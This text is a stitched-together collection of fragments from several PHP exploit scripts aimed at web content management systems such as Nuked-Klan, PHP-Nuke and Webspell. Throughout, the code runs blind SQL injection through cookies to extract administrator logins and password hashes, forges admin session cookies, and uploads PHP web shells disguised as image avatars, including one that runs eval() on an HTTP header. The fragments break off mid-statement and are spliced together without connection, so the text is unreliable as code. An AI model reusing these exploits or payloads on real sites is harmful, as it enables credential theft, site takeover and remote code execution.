}
$url = getparam("url", 1);
$login = getparam("login", 1);
$pass = getparam("pass", 1);
$email = getparam("email", 1);
$file = getparam("file", 1);
$id = getparam("id");
$source = @file_get_contents($file);
if (strlen($source) < 2) {
exit("{$file} don't exist.\n");
}
$xpl = new phpsploit();
$s = $xpl->post($url . "/index.php?", "sql_pseudo={$login}&sql_pass={$pass}");
//Cookies
if (preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i", $s, $phpsessid) && !preg_match("#name=\"sql_pseudo\"#i", $s)) {
$xpl->addcookie("PHPSESSID", $phpsessid[1]);
$xpl->addcookie("sql_pseudo", $login);
$xpl->addcookie("sql_pass", md5($pass));
$xpl->addcookie("auto", "off");
print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
$id = $id_member[1];
}
print "[*] Id : {$id}\n";
//Upload
$formdata = array(frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil', 'action' => 'modifier', 'ok' => '1', 'id' => $id, 'pseudo' => $login, 'sql_newNom' => $login, 'sql_newMail' => $email, 'MAX_FILE_SIZE' => '2097152', 'valider' => ' Modifier mon profil', 'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source));
$xpl->get($url . str_replace("./", "/", $matches[1]));
preg_match_all("#(.*)='(.*)';#", $xpl->getcontent(), $vars);
for ($z = 0; $z <= 4; $z++) {
print "\nsploit> " . strtolower($vars[1][$z]) . " -> " . $vars[2][$z];
}
}
}
print "\nstatus> Trying to get the administrator login/passwd";
$headers = array("Username", "Password");
$fields = array("login", "passwd");
$value = $length = array();
for ($a = 0; $a < 2; $a++) {
print "\nsploit> " . $headers[$a] . " length ";
for ($b = 1; $b < 3; $b++) {
for ($c = 48; $c <= 57; $c++) {
$xpl->addcookie("fid", "-1%20OR%20SUBSTR(LENGTH((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201)),{$b},1)=CHAR({$c})");
if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
$length[$a] .= chr($c);
print chr($c);
break;
}
}
}
print "\nsploit> " . $headers[$a] . " -> ";
for ($d = 1; $d <= $length[$a]; $d++) {
for ($e = 0; $e <= 128; $e++) {
$xpl->addcookie("fid", "-1%20OR%20HEX(SUBSTR((SELECT%20" . $fields[$a] . "%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201),{$d},1))=HEX(CHAR({$e}))");
if (!preg_match("#<TITLE></TITLE>#i", $xpl->getcontent($xpl->get($url . "forum.php")))) {
$value[$a] .= chr($e);
print chr($e);
break;
# 71. list($AIpass, $Xsuper_admintest)=mysql_fetch_row($result);
# 72. if (md5($AIpass) == $AIpwd and $AIpass != "") {
# 73. $admintest = true;
# 74. $super_admintest = $Xsuper_admintest;
# 75. } else {
# 76. Admin_Alert("Password in Cookies not Good #1 : $aid / $AIpwd | ");
# 77. }
# 78. }
# 79. unset ($AIpass);
# 80. unset ($AIpwd);
# 81. unset ($Xadmin);
# 82. unset ($Xsuper_admintest);
# 83. }
#
$c*k = urlencode(base64_encode($aid[1] . ':' . md5($pwd[1])));
$xpl->addcookie('admin', $c*k);
print "\nAdmin_cookie: admin={$c*k}\n\$shell> ";
# +admin/settings.php (CODE EXECUTION)
# |
# 758. switch($op) {
# 763. case "ConfigSave":
# 764. include("admin/settings_save.php");
# 765. ConfigSave($xparse,$xsitename,$xnuke_url,$xsite_logo,$xslogan,$xstartdate,$xadminmail,
# $xtop,$xstoryhome,$xoldnum,$xultramode,$xanonpost,$xDefault_Theme,$xbanners,$xmyIP,
# $xfoot1,$xfoot2,$xfoot3,$xfoot4,$xbackend_title,$xbackend_language,$xbackend_image,
# $xbackend_width,$xbackend_height,$xlanguage,$xlocale,$xperpage,$xpopular,$xnewlinks,
# $xtoplinks,$xlinksresults,$xlinks_anonaddlinklock,$xnotify,$xnotify_email,$xnotify_subject,
# $xnotify_message,$xnotify_from,$xmoderate,$xcommentlimit,$xanonymous,$xmaxOptions,$xBarScale,
# $xsetCookies,$xtipath,$xuserimg,$xadminimg,$xadmingraphic,$xsite_font,$xadmart,$xminpass,
# $xhttpref,$xhttprefmax,$xpollcomm,$xlinkmainlogo,$xstart_page,$xsmilies,$xOnCatNewLink,
# $xEmailFooter,$xshort_user,$xgzhandler,$xrss_host_verif,$xcache_verif,$xmember_list,
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url . 'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file)));
# `c2c`) VALUES ('".$nsnst_const['ban_user_id']."', '$ban_username2', '".$nsnst_const['ban_time']."',
# '".$nsnst_const['remote_ip']."', '".$nsnst_const['remote_long']."', '$pg', '$user_agent', '$refered_from',
# '".$nsnst_const['forward_ip']."', '".$nsnst_const['client_ip']."', '".$nsnst_const['remote_addr']."',
# '".$nsnst_const['remote_port']."', '".$nsnst_const['request_method']."', '$c2c')");
#
# We insert a row in $prefix."_nsnst_tracked_ips".
#
print "\nInserting a row in {$prfix}_nsnst_tracked_ips";
$xpl->addheader("Client-IP", "255.255.255.255");
$xpl->get($url . 'index.php');
# Trying to find a valid tid.
# Needed for $tum > 0.
#
print "\nTrying to find a valid tid (max hits={$nbtst})";
$sql = "' OR 1=1#";
$xpl->addcookie("admin", urlencode(base64_encode($sql . ':1:')));
for ($c = $tid; $c <= $nbtst; $c++) {
$xpl->get($url . "includes/nsbypass.php?tid={$c}");
if (!preg_match("#phpnuke.org#", $xpl->getheader())) {
$tid = $c;
print "\nValid tid found: {$tid}\nHash: {$login} -> ";
break;
}
if ($c == $nbtst) {
exit("\n#1 Exploit failed");
}
}
# MD5 hash length [32]
#
for ($a = 1; $a <= 32; $a++) {
# MD5 charset [a-f0-9]
print " by Charles \"real\" F. <charlesfol[at]hotmail.fr>\n\n";
if ($argc < 3) {
print "usage: php phptn_exploit.php -url <url> [options]\n\n";
print " Options: -mode 0 -> Remote Upload (default)\n";
print " 1 -> Remote Code Execution\n";
print " -proxy If you want to use a proxy.\n";
exit;
}
$url = getparam("url", 1);
$mode = getparam("mode") ? getparam("mode") : 0;
$prx = getparam("proxy");
$xpl = new phpsploit();
if ($prx) {
$xpl->proxy($prx);
}
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar */
if ($mode == 0) {
$file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
$c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
$c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
print "done\n";
} else {
die("error\n");
}
print " SID -> {$admin_sid}\n";
print " UID -> {$admin_uid}\n";
finalattack($admin_sid, $admin_uid);
} else {
exit("[*] Can't log in\n");
}
} else {
/* User account defined */
if ($acc) {
print "[*] Using user account {$acc}\n";
list($login, $passwd) = explode(":", $acc);
$xpl->addheader("Referer", $url);
$c = $xpl->post($url . "index.php?file=User&nuked_nude=index&op=login", "pseudo={$login}&pass={$passwd}&remember_me=ok");
if (preg_match("#{$prefix}sess_id=([a-z0-9]+)#i", $c, $sid) && preg_match("#uid=([a-z0-9]+)#i", $c, $uid)) {
# User Cookies
$xpl->addcookie("{$prefix}sess_id", $sid[1]);
$xpl->addcookie("{$prefix}user_id", $uid[1]);
} else {
exit("[*] Can't log in\n");
}
}
$queries = array();
$queries[] = array(" SID", "SELECT id FROM nuked_sessions WHERE user_id=(SELECT id FROM {$prefix}users WHERE niveau>=9 ORDER BY date LIMIT 0,1) LIMIT 0,1");
$queries[] = array(" UID", "SELECT id FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array(" Login", "SELECT pseudo FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$queries[] = array("Password", "SELECT pass FROM nuked_users WHERE niveau>=9 LIMIT 0,1");
$xpl->agent("Mozilla Firefox");
$xpl->addheader("X-Forwarded-For", "127.0.0.1");
$ctmp = $xpl->get($url . "index.php?file=Stats&page=visits");
if (preg_match('#<a href="javascript:history.back\\(\\)"><b>[^<]+</b>#i', $ctmp)) {
exit("[*] You don't have rights to access Stats page.\n");
$xpl->get($url);
$xpl->reset('header');
}
if (!preg_match_all("#{$config['3']}([0123]{1})(\\S*){$config['3']}([0123]{1})#", $xpl->getcontent(), $matches)) {
die("Exploit Failed");
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
exit("\nNo session found");
}
# Logged in as admin
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]);
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
exit("\nNo file found");
} else {
print "\n\$shell> ";
}
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
